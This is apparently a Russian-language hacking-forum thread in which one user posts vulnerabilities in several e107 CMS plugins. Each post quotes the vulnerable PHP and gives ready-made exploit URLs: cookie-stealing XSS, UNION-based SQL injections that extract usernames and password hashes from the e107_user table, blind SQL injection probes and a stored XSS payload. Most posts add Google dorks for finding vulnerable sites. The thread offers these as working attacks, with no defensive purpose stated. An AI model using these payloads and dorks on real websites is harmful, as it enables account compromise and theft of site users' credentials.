[ Обзор уязвимостей e107 cms ]

Discussion in 'Веб-уязвимости' started by ettee, 16 Aug 2007.

  1. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    roll_mini v1.2

    XSS:
    /roll.php
    PHP:
    if ($_GET['cat']) $id_cat $_GET['cat']; else $id_cat "1";
    Пример:
    Code:
    http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Необходимы права администратора, SQL injection:
    /roll.php
    PHP:
    if ($_GET['cat']) $id_cat $_GET['cat']; else $id_cat "1";
    if (
    $_GET['add']) $add $_GET['add'];
    if (
    $_GET['edit']) $edit $_GET['edit'];
    if (
    $_GET['card_id']) $card_id $_GET['card_id'];
    if (
    $_GET['index_name']) $index_name $_GET['index_name'];
    if (
    $_GET['search']) $search $_GET['search'];
    if (
    $_GET['page']) { $page $_GET['page']; } else { $page 1; }
    А дальше там обращения к БД с этими переменными. Ничего не фильтруется.
    Пример:
    Code:
    http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E&card_id=-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4,5,6%20from%20e107_user&edit=1
    Путь:
    http://e107/e107_plugins/roll_mini/search.php


    Дорк:inurl:e107_plugins/roll_mini/
     
    1 person likes this.
  2. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Locator v1.2

    Необходимы права администратора, SQL injection:
    /admin_countries.php
    PHP:
        $sql -> db_Select(DB_TABLE_LOCATOR_COUNTRY"*""locator_country_id=".$_GET['locator_country_id']);
    Пример:
    Code:
    http://e107/e107_plugins/locator/admin_countries.php?edit_country=1&locator_country_id=1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--
    Необходимы права администратора, SQL injection:
    /admin_categories.php
    PHP:
    $sql -> db_Select(DB_TABLE_LOCATOR_TABLE"*""locator_cat_id=".$_GET['locator_cat_id']);
    Пример:
    Code:
    http://e107/e107_plugins/locator/admin_categories.php?edit_category=1&locator_cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--
    В админке ещё много чего бажного.

    Дорк:inurl:e107_plugins/locator/
     
    2 people like this.
  3. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    League Version 1.04

    SQL injection:
    /lique.php
    PHP:
    ...
    if(
    $_GET['Saison']){$Saison=$_GET['Saison'];}
    ...
    $query[0]="lique_games";
                
    $query[1]="*";
                
    $query[2]="games_home_id=".$pref['lique_my_team']." AND games_saison_id=".$Saison." AND games_date<".$A=(time()-86400)." AND games_date>".(time()-604500)." OR games_gast_id=".$pref['lique_my_team']." AND games_date<".$A=(time()-86400)." AND games_date>".(time()-604500)." ORDER BY games_date ";

    ...
    Пример:
    Code:
    http://e107/e107_plugins/lique/lique.php?Saison=-2%20union%20select%201,concat_ws%280x3a,user_name,user_password%29,3,4,5%20from%20e107_user--
    Blind SQL injection:
    /scorer.php
    PHP:
    ...
    if(
    $_GET['Saison']){$Saison=$_GET['Saison'];}else{$Saison=$pref['lique_my_saison'];}
    if(
    $_GET['team']){$team=$_GET['team'];}else{$team=$pref['lique_my_team'];}

    $z['games']=0;
             
    $sql -> db_Select("lique_games""*""games_home_id=".$team." OR games_gast_id=".$team." ");
             while(
    $row $sql-> db_Fetch()){
             
    $z['games']++;
            }

    $qry1="
       SELECT m.*, me.* FROM "
    .MPREFIX."lique_liga AS m 
       LEFT JOIN "
    .MPREFIX."lique_teams AS me ON me.team_id=m.liga_team_id   
       WHERE m.liga_id ='"
    .$team."'
               "
    ;
        
    $sql->db_Select_gen($qry1);
         
    $row $sql-> db_Fetch();
             
    $team_ID=$row['team_id'];
             
    $team_Name=$row['team_name'];
             
    $team_admin=$row['team_admin_id'];
             
    $team_url=$row['team_url'];
             
    $team_icon=$row['team_icon'];
             
    $team_description=$row['team_description'];

    $z['players']=0;
             
    $sql -> db_Select("lique_roster""*""roster_team_id=".$team."");
             while(
    $row $sql-> db_Fetch()){
             
    $z['players']++;
            }
    ...
    Пример:
    Code:
    http://e107/e107_plugins/lique/scorer.php?team=1%20and%20substring%28@@version,1,1%29=5
    Blind SQL injection:
    /strafen.php
    PHP:
    ...
    if(
    $_GET['Saison']){$Saison=$_GET['Saison'];}else{$Saison=$pref['lique_my_saison'];}
    if(
    $_GET['team']){$team=$_GET['team'];}else{$team=$pref['lique_my_team'];}

    $z['games']=0;
             
    $sql -> db_Select("lique_games""*""games_home_id=".$team." OR games_gast_id=".$team." ");
             while(
    $row $sql-> db_Fetch()){
             
    $z['games']++;
            }
    $qry1="
       SELECT m.*, me.* FROM "
    .MPREFIX."lique_liga AS m 
       LEFT JOIN "
    .MPREFIX."lique_teams AS me ON me.team_id=m.liga_team_id   
       WHERE m.liga_id ='"
    .$team."'
       "
    ;
        
    $sql->db_Select_gen($qry1);
         
    $row $sql-> db_Fetch();
             
    $team_ID=$row['team_id'];
             
    $team_Name=$row['team_name'];
             
    $team_admin=$row['team_admin_id'];
             
    $team_url=$row['team_url'];
             
    $team_icon=$row['team_icon'];
             
    $team_description=$row['team_description'];

    $z['players']=0;
             
    $sql -> db_Select("lique_roster""*""roster_team_id=".$team."");
             while(
    $row $sql-> db_Fetch()){
             
    $z['players']++;
            }

    ...
    Пример:
    Code:
    http://e107/e107_plugins/lique/strafen.php?team=1%20and%20substring%28@@version,1,1%29=5
    И много ещё чего бажного...
    Дорк:inurl:e107_plugins/lique/
     
  4. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC MOH Stats V1.0

    SQL injection:
    /Member_Details.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }

    ...
    $sql ->db_Select("user_extended""*""WHERE user_extended_id=$sub_action","");
    $row $sql->db_Fetch();
    $sql2 ->db_Select("user""*""WHERE user_id='".$row['user_extended_id']."'","");

    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_mohstats/Member_Details.php?det.2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
    Дорк:inurl:e107_plugins/aacgc_mohstats/
     
    2 people like this.
  5. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Userclass Images v09 Beta

    Необходимы права администратора, SQL injection:
    /admin.php
    PHP:
    ...
    $q "SELECT * FROM ".MPREFIX."userclass_images WHERE userclass_id='$_POST[uid]'";
    ...
     
    #85 Фараон, 7 Jan 2011
    Last edited: 7 Jan 2011
    1 person likes this.
  6. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    EveryPage v1.0

    Необходимы права администратора, SQL injection:
    /admin_config.php
    PHP:
    ...
    $query "ep_text='"$_POST['code'] ."' WHERE ep_id='"$_POST['id'] ."'";
    ...
     
    #86 Фараон, 7 Jan 2011
    Last edited: 7 Jan 2011
    1 person likes this.
  7. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Prayer Request Menu
    Version 2.5


    Active XSS:
    /prayers.php
    PHP:
    ...
    $_POST['prayer_name'];
    $_POST['prayer_body'];
    ...
    Выше перечисленные переменные никак не фильтруются, в итоге бы получаем активную XSS!
    Заходим на страницу http://e107/e107_plugins/prayer_menu/prayers.php?0.submit.0.0.0 и добавляем коммент с содежанием "<script>alert(111)</script>" в формы "Title and Prayer Request"

    Дорк:inurl:e107_plugins/prayer_menu/
    P.S выполнял под правами администратора. Так что не отвечаю за смертных юзеров ;)
     
    #87 Фараон, 15 Jan 2011
    Last edited: 15 Jan 2011
    1 person likes this.